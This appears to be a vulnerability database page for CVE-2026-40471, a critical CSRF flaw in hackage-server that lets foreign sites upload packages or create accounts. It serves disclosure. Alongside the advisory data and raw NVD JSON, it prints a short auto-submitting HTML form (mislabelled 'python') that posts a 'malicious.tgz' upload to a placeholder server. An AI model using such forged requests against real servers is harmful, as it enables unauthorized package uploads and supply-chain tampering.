CVE-2026-40471

Description

hackage-server lacked Cross-Site Request Forgery (CSRF) protection across its endpoints. Scripts on foreign sites could trigger requests to hackage server, possibly abusing latent credentials to upload packages or perform other administrative actions. Some unauthenticated actions could also be abused (e.g. creating new user accounts).

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

hackage-server (具体受影响版本请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-40471: CSRF on hackage-server -->
<html>
<body>
  <!-- Form auto-submits to exploit lack of CSRF token -->
  <form action="http://target-server/upload" method="POST">
    <input type="hidden" name="package" value="malicious.tgz" />
    <input type="submit" value="Click Me" />
  </form>
  <script>
    // Auto-trigger submission
    document.forms[0].submit();
  </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40471
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40471
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40471/
[4] VulDB https://vuldb.com/cve/CVE-2026-40471
[5] https://osv.dev/vulnerability/HSEC-2026-0002

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40471", "sourceIdentifier": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "published": "2026-04-23T16:16:25.640", "lastModified": "2026-04-24T14:41:55.890", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "hackage-server lacked Cross-Site Request Forgery (CSRF) protection across its endpoints. Scripts on foreign sites could trigger requests to hackage server, possibly abusing latent credentials to upload packages or perform other administrative actions. Some unauthenticated actions could also be abused (e.g. creating new user accounts)."}], "metrics": {"cvssMetricV31": [{"source": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "74b3a70d-cca6-4d34-9789-e83b222ae3be", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://osv.dev/vulnerability/HSEC-2026-0002", "source": "74b3a70d-cca6-4d34-9789-e83b222ae3be"}]}}